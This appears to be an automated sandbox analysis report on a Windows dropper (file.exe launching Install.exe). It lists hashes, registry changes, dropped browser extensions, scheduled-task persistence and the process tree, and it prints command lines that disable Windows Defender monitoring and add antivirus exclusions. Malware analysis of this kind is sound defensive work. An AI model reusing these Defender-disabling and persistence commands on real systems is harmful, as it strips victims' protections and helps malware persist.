Analysis
-
max time kernel
131s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
22-12-2022 21:12
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
5eb66c5d58f44b54be2a6b4933e31386
-
SHA1
9685cbc7d1bac2f9cbf38c0d5914e5e0b991959d
-
SHA256
fea6682a08b3782f7b53c2fe34bf36d303738ad329688655984e3a0cacd50ae4
-
SHA512
2d216a87daed519a3c026b39a47f6c80fb8c372e9e6f37ede8d9c47fe5af343a95bc93f833238cc20504c25e28fff34726752e1b585c8702ed8d4632f1a39131
-
SSDEEP
196608:91Omxeg0v3hoTKwSBFRxYgIYrk6yzlqCDAKcvZ5xEZt:3O2ezvxo+N6gIYr9kf6kZt
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mMQoIZnNGNdU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VMeMEPztOsUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mMQoIZnNGNdU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JVfpBtJrTNfNsQVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pIYRwKxBaOzqikCb = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VpeeuBoLdsfCC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mgLqjNPWU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JVfpBtJrTNfNsQVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pIYRwKxBaOzqikCb = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VpeeuBoLdsfCC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kFdzwgcsqDZevnSgonR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kFdzwgcsqDZevnSgonR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mgLqjNPWU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pIYRwKxBaOzqikCb = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VMeMEPztOsUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pIYRwKxBaOzqikCb = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 936 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1476 Install.exe 892 Install.exe 1100 rBalGpw.exe 888 sartqAJ.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Control Panel\International\Geo\Nation sartqAJ.exe -
Loads dropped DLL 12 IoCs
pid Process 1472 file.exe 1476 Install.exe 1476 Install.exe 1476 Install.exe 1476 Install.exe 892 Install.exe 892 Install.exe 892 Install.exe 936 rundll32.exe 936 rundll32.exe 936 rundll32.exe 936 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json sartqAJ.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA sartqAJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 sartqAJ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat sartqAJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA sartqAJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA sartqAJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D sartqAJ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol sartqAJ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D sartqAJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rBalGpw.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rBalGpw.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rBalGpw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA sartqAJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 sartqAJ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja sartqAJ.exe File created C:\Program Files (x86)\mMQoIZnNGNdU2\EQTOHQUSwHMof.dll sartqAJ.exe File created C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\bIPhSiU.dll sartqAJ.exe File created C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\yNTrlzl.xml sartqAJ.exe File created C:\Program Files (x86)\mgLqjNPWU\QOQSHo.dll sartqAJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi sartqAJ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak sartqAJ.exe File created C:\Program Files (x86)\mgLqjNPWU\WpyDkak.xml sartqAJ.exe File created C:\Program Files (x86)\mMQoIZnNGNdU2\zrZZooG.xml sartqAJ.exe File created C:\Program Files (x86)\VpeeuBoLdsfCC\pcuVDUa.dll sartqAJ.exe File created C:\Program Files (x86)\VpeeuBoLdsfCC\VIjbMOF.xml sartqAJ.exe File created C:\Program Files (x86)\VMeMEPztOsUn\RnlPjcC.dll sartqAJ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi sartqAJ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bVPnZmTmfBquXJeKIT.job schtasks.exe File created C:\Windows\Tasks\CeimXGcICqHikUZiG.job schtasks.exe File created C:\Windows\Tasks\UQjVtDzLrufMISZ.job schtasks.exe File created C:\Windows\Tasks\rTRcbUUPNNGcKFAGn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 552 schtasks.exe 1524 schtasks.exe 1780 schtasks.exe 1832 schtasks.exe 1316 schtasks.exe 860 schtasks.exe 1788 schtasks.exe 1316 schtasks.exe 1596 schtasks.exe 1092 schtasks.exe 1364 schtasks.exe 1560 schtasks.exe 1876 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecision = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA} sartqAJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\WpadDecisionReason = "1" sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 sartqAJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\WpadNetworkName = "Network" sartqAJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\WpadDecision = "0" sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates sartqAJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\WpadDecisionTime = e0dc1eb85216d901 sartqAJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDetectedUrl rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecisionTime = e0dc1eb85216d901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\5e-2f-ac-5a-ab-cd sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" sartqAJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs sartqAJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs sartqAJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sartqAJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\5e-2f-ac-5a-ab-cd rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0032000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 sartqAJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecision = "0" sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates sartqAJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs sartqAJ.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1352 powershell.EXE 1352 powershell.EXE 1352 powershell.EXE 480 powershell.EXE 480 powershell.EXE 480 powershell.EXE 1936 powershell.EXE 1936 powershell.EXE 1936 powershell.EXE 284 powershell.EXE 284 powershell.EXE 284 powershell.EXE 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe 888 sartqAJ.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1352 powershell.EXE Token: SeDebugPrivilege 480 powershell.EXE Token: SeDebugPrivilege 1936 powershell.EXE Token: SeDebugPrivilege 284 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1472 wrote to memory of 1476 1472 file.exe 28 PID 1472 wrote to memory of 1476 1472 file.exe 28 PID 1472 wrote to memory of 1476 1472 file.exe 28 PID 1472 wrote to memory of 1476 1472 file.exe 28 PID 1472 wrote to memory of 1476 1472 file.exe 28 PID 1472 wrote to memory of 1476 1472 file.exe 28 PID 1472 wrote to memory of 1476 1472 file.exe 28 PID 1476 wrote to memory of 892 1476 Install.exe 29 PID 1476 wrote to memory of 892 1476 Install.exe 29 PID 1476 wrote to memory of 892 1476 Install.exe 29 PID 1476 wrote to memory of 892 1476 Install.exe 29 PID 1476 wrote to memory of 892 1476 Install.exe 29 PID 1476 wrote to memory of 892 1476 Install.exe 29 PID 1476 wrote to memory of 892 1476 Install.exe 29 PID 892 wrote to memory of 1832 892 Install.exe 31 PID 892 wrote to memory of 1832 892 Install.exe 31 PID 892 wrote to memory of 1832 892 Install.exe 31 PID 892 wrote to memory of 1832 892 Install.exe 31 PID 892 wrote to memory of 1832 892 Install.exe 31 PID 892 wrote to memory of 1832 892 Install.exe 31 PID 892 wrote to memory of 1832 892 Install.exe 31 PID 892 wrote to memory of 984 892 Install.exe 33 PID 892 wrote to memory of 984 892 Install.exe 33 PID 892 wrote to memory of 984 892 Install.exe 33 PID 892 wrote to memory of 984 892 Install.exe 33 PID 892 wrote to memory of 984 892 Install.exe 33 PID 892 wrote to memory of 984 892 Install.exe 33 PID 892 wrote to memory of 984 892 Install.exe 33 PID 1832 wrote to memory of 1520 1832 forfiles.exe 35 PID 1832 wrote to memory of 1520 1832 forfiles.exe 35 PID 1832 wrote to memory of 1520 1832 forfiles.exe 35 PID 1832 wrote to memory of 1520 1832 forfiles.exe 35 PID 1832 wrote to memory of 1520 1832 forfiles.exe 35 PID 1832 wrote to memory of 1520 1832 forfiles.exe 35 PID 1832 wrote to memory of 1520 1832 forfiles.exe 35 PID 984 wrote to memory of 1948 984 forfiles.exe 36 PID 984 wrote to memory of 1948 984 forfiles.exe 36 PID 984 wrote to memory of 1948 984 forfiles.exe 36 PID 984 wrote to memory of 1948 984 forfiles.exe 36 PID 984 wrote to memory of 1948 984 forfiles.exe 36 PID 984 wrote to memory of 1948 984 forfiles.exe 36 PID 984 wrote to memory of 1948 984 forfiles.exe 36 PID 1520 wrote to memory of 820 1520 cmd.exe 37 PID 1520 wrote to memory of 820 1520 cmd.exe 37 PID 1520 wrote to memory of 820 1520 cmd.exe 37 PID 1520 wrote to memory of 820 1520 cmd.exe 37 PID 1520 wrote to memory of 820 1520 cmd.exe 37 PID 1520 wrote to memory of 820 1520 cmd.exe 37 PID 1520 wrote to memory of 820 1520 cmd.exe 37 PID 1948 wrote to memory of 1696 1948 cmd.exe 38 PID 1948 wrote to memory of 1696 1948 cmd.exe 38 PID 1948 wrote to memory of 1696 1948 cmd.exe 38 PID 1948 wrote to memory of 1696 1948 cmd.exe 38 PID 1948 wrote to memory of 1696 1948 cmd.exe 38 PID 1948 wrote to memory of 1696 1948 cmd.exe 38 PID 1948 wrote to memory of 1696 1948 cmd.exe 38 PID 1948 wrote to memory of 552 1948 cmd.exe 39 PID 1948 wrote to memory of 552 1948 cmd.exe 39 PID 1948 wrote to memory of 552 1948 cmd.exe 39 PID 1948 wrote to memory of 552 1948 cmd.exe 39 PID 1948 wrote to memory of 552 1948 cmd.exe 39 PID 1948 wrote to memory of 552 1948 cmd.exe 39 PID 1948 wrote to memory of 552 1948 cmd.exe 39 PID 1520 wrote to memory of 1700 1520 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\7zS224.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Users\Admin\AppData\Local\Temp\7zS530.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
